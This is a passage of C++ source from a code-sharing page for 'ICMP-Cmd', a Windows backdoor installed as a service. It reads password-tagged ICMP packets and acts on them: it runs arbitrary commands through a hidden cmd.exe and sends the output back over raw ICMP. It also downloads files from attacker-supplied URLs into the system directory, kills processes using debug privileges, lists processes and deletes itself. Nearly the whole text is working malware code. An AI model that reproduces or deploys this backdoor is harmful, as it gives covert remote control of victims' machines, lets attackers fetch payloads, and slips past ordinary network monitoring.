📄 icmpsrv.cpp
字号:
printf("Failure !\n");
}
CloseServiceHandle(schSCManager);
}
else
{
printf("Stopping Service .... ");
if(QueryServiceStatus(schService,&RemoveServiceStatus)!=0)
{
if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED)
{
printf("already Stopped !\n");
}
else
{
printf("Pending ... ");
if(ControlService(schService,SERVICE_CONTROL_STOP,&RemoveServiceStatus)!=0)
{
while(RemoveServiceStatus.dwCurrentState==SERVICE_STOP_PENDING)
{
Sleep(10);
QueryServiceStatus(schService,&RemoveServiceStatus);
}
if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED)
{
printf("Success !\n");
}
else
{
printf("Failure !\n");
}
}
else
{
printf("Failure !\n");
}
}
}
else
{
printf("Query Failure !\n");
}
printf("Removing Service .... ");
if(DeleteService(schService)==0)
{
printf("Failure !\n");
}
else
{
printf("Success !\n");
}
}
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService);
printf("Removing File ....... ");
Sleep(1500);
hSearch=FindFirstFile(lpImagePath,&FileData);
if(hSearch==INVALID_HANDLE_VALUE)
{
printf("no Exists !\n");
}
else
{
if(DeleteFile(lpImagePath)==0)
{
printf("Failure !\n");
}
else
{
printf("Success !\n");
}
FindClose(hSearch);
}
return ;
}
void decode_resp(char *buf, int bytes,struct sockaddr_in *from)
{
IpHeader *iphdr;
IcmpHeader *icmphdr;
unsigned short iphdrlen;
iphdr = (IpHeader *)buf;
iphdrlen = iphdr->h_len * 4 ;
icmphdr = (IcmpHeader*)(buf + iphdrlen);
if(icmphdr->i_seq==ICMP_PASSWORD)//密码正确则输出数据段
{
ICMP_DEST_IP=inet_ntoa(from->sin_addr);//取得ICMP包的源地址
memcpy(arg,buf+iphdrlen+12,256);
if (!memcmp(arg,"pskill",6))
{
killps(atoi(strstr(arg," ")));
memcpy(buffer,"Process is Killed!",sizeof("Process is Killed!"));
send();
}
else if (!memcmp(arg,"pslist",6)){pslist();send();}
else if (!strcmp(arg,"remove\n"))
{
RemoveCmdService();
memcpy(buffer,"Service Removed!",sizeof("Service Removed!"));
send();
return;
}
////////////************ http下载 *************
else if (!memcmp(arg,"http://",7))
{
if(char *FileName=strstr(arg,"-"))
{
char url[200];//保存网址的数组
memset(url,0,200);
memcpy(url,arg,int(FileName-arg-1));
char fname[MAX_PATH];
GetSystemDirectory(fname,MAX_PATH);
FileName++;
strcat(fname,"\\");
strcat(fname,FileName);
*strstr(fname,"\n")=NULL;
HRESULT hRet=URLDownloadToFile(0,url,fname,0,0);
memset(buffer,0,sizeof(buffer));
if(hRet==S_OK) memcpy(buffer,"Download OK!\n",sizeof("Download OK\n"));
else
memcpy(buffer,"Download Failure!\n",sizeof("Download Failure!\n"));
send();
return;
}
}
//*******************************************
else{
SECURITY_ATTRIBUTES sa;//创建匿名管道用于取得cmd的命令输出
HANDLE hRead,hWrite;
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE;
if (!CreatePipe(&hRead,&hWrite,&sa,0))
{
printf("Error On CreatePipe()");
return;
}
STARTUPINFO si;
PROCESS_INFORMATION pi;
si.cb = sizeof(STARTUPINFO);
GetStartupInfo(&si);
si.hStdError = hWrite;
si.hStdOutput = hWrite;
si.wShowWindow = SW_HIDE;
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
char cmdline[270];
GetSystemDirectory(cmdline,MAX_PATH+1);
strcat(cmdline,"\\cmd.exe /c");
strcat(cmdline,arg);
if (!CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi))
{
printf("Error on CreateProcess()");
return;
}
CloseHandle(hWrite);
DWORD bytesRead;
for(;;){
if (!ReadFile(hRead,buffer,2048,&bytesRead,NULL))break;
Sleep(200);
}
//printf("%s",buffer);
/////////////////////////////////////////////
//发送输出数据
send();
}
////////////////////////////////////////////////
}
//else printf("Other ICMP Packets!\n");
//printf(endl;
}
USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size >1)
{
cksum+=*buffer++;
size -=sizeof(USHORT);
}
if(size ) {
cksum += *(UCHAR*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);
}
void fill_icmp_data(char * icmp_data)
{
IcmpHeader *icmp_hdr;
char *datapart;
icmp_hdr = (IcmpHeader*)icmp_data;
icmp_hdr->i_type = 0;
icmp_hdr->i_code = 0;
icmp_hdr->i_id = (USHORT) GetCurrentProcessId();
icmp_hdr->i_cksum = 0;
icmp_hdr->i_seq =4321;
icmp_hdr->timestamp = GetTickCount(); //设置时间戳
datapart = icmp_data + sizeof(IcmpHeader);
memcpy(datapart,buffer,strlen(buffer));
//for(int i=0;i<sizeof(buffer);i++) datapart[i]=buffer[i];
}
void usage(char *par)
{
printf("\t\t=====Welcome to www.hackerxfiles.net======\n");
printf("\n");
printf("\t\t---[ ICMP-Cmd v1.0 beta, by gxisone ]---\n");
printf("\t\t---[ E-mail: gxisone@hotmail.com ]---\n");
printf("\t\t---[ 2003/8/15 ]---\n");
printf("\n");
printf("\t\tUsage: %s -install (to install service)\n",par);
printf("\t\t %s -remove (to remove service)\n",par);
printf("\n");
return ;
}
void send(void)
{
WSADATA wsaData;
SOCKET sockRaw = (SOCKET)NULL;
struct sockaddr_in dest;
int bread,datasize,retval,bwrote;
int timeout = 1000;
char *icmp_data;
if((retval=WSAStartup(MAKEWORD(2,1),&wsaData)) != 0) ExitProcess(STATUS_FAILED);
if((sockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL,0,WSA_FLAG_OVERLAPPED))
==INVALID_SOCKET) ExitProcess(STATUS_FAILED);
__try
{
if((bread=setsockopt(sockRaw,SOL_SOCKET,SO_SNDTIMEO,(char*)&timeout,sizeof(timeout)))==SOCKET_ERROR) __leave;
//设置发送超时
memset(&dest,0,sizeof(dest));
dest.sin_family = AF_INET;
dest.sin_addr.s_addr = inet_addr(ICMP_DEST_IP);
datasize=strlen(buffer);
datasize+=sizeof(IcmpHeader);
icmp_data=(char*)xmalloc(MAX_PACKET);
if(!icmp_data) __leave;
memset(icmp_data,0,MAX_PACKET);
fill_icmp_data(icmp_data); //填充ICMP报文
((IcmpHeader*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, datasize); //计算校验和
bwrote=sendto(sockRaw,icmp_data,datasize,0,(struct sockaddr*)&dest,sizeof(dest)); //发送报文
if (bwrote == SOCKET_ERROR)
{
//if (WSAGetLastError() == WSAETIMEDOUT) printf("Timed out\n");
//printf("sendto failed:"<<WSAGetLastError()<<endl;
__leave;
}
//printf("Send Packet to %s Success!\n"<<ICMP_DEST_IP<<endl;
}
__finally
{
if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
WSACleanup();
}
memset(buffer,0,sizeof(buffer));
Sleep(200);
}
void pslist(void)
{
HANDLE hProcessSnap = NULL;
PROCESSENTRY32 pe32= {0};
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hProcessSnap == (HANDLE)-1)
{
printf("\nCreateToolhelp32Snapshot() failed:%d",GetLastError());
return ;
}
pe32.dwSize = sizeof(PROCESSENTRY32);
printf("\nProcessName ProcessID");
if (Process32First(hProcessSnap, &pe32))
{
char a[5];
do
{
strcat(buffer,pe32.szExeFile);
strcat(buffer,"\t\t");
itoa(pe32.th32ProcessID,a,10);
strcat(buffer,a);
strcat(buffer,"\n");
//printf("\n%-20s%d",pe32.szExeFile,pe32.th32ProcessID);
}
while (Process32Next(hProcessSnap, &pe32));
}
else
{
printf("\nProcess32Firstt() failed:%d",GetLastError());
}
CloseHandle (hProcessSnap);
return;
}
BOOL SetPrivilege(HANDLE hToken,LPCTSTR lpszPrivilege,BOOL bEnablePrivilege)//提示权限
{
TOKEN_PRIVILEGES tp;
LUID luid;
if(!LookupPrivilegeValue(NULL,lpszPrivilege,&luid))
{
printf("\nLookupPrivilegeValue error:%d", GetLastError() );
return FALSE;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
if (bEnablePrivilege)
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
else
tp.Privileges[0].Attributes = 0;
// Enable the privilege or disable all privileges.
AdjustTokenPrivileges(
hToken,
FALSE,
&tp,
sizeof(TOKEN_PRIVILEGES),
(PTOKEN_PRIVILEGES) NULL,
(PDWORD) NULL);
// Call GetLastError to determine whether the function succeeded.
if (GetLastError() != ERROR_SUCCESS)
{
printf("AdjustTokenPrivileges failed: %u\n", GetLastError() );
return FALSE;
}
return TRUE;
}
////////////////////////////////////////////////////////////////////////////
BOOL killps(DWORD id)//杀进程函数
{
HANDLE hProcess=NULL,hProcessToken=NULL;
BOOL IsKilled=FALSE,bRet=FALSE;
__try
{
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hProcessToken))
{
printf("\nOpen Current Process Token failed:%d",GetLastError());
__leave;
}
//printf("\nOpen Current Process Token ok!");
if(!SetPrivilege(hProcessToken,SE_DEBUG_NAME,TRUE))
{
__leave;
}
printf("\nSetPrivilege ok!");
if((hProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,id))==NULL)
{
printf("\nOpen Process %d failed:%d",id,GetLastError());
__leave;
}
//printf("\nOpen Process %d ok!",id);
if(!TerminateProcess(hProcess,1))
{
printf("\nTerminateProcess failed:%d",GetLastError());
__leave;
}
IsKilled=TRUE;
}
__finally
{
if(hProcessToken!=NULL) CloseHandle(hProcessToken);
if(hProcess!=NULL) CloseHandle(hProcess);
}
return(IsKilled);
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -